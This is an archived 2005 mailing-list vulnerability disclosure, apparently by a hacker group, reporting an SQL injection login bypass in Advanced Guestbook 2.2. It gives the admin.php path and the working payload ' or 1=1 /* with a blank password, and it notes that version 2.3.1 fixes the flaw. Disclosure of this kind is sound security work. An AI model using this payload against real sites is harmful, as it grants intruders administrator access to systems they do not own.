OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Advanced Guestbook 2.2 ( SQL Injection Exploit )

bhs_teamyahoo.com
Date: Sun Nov 06 2005 - 13:03:12 CST


Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.

Target :

http://www.example.com/[GuestbookTarget]/admin.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)

It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.

Report By : POPO ( Pooya )
From www.Babol-Hackers.com
bhs_teamyahoo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p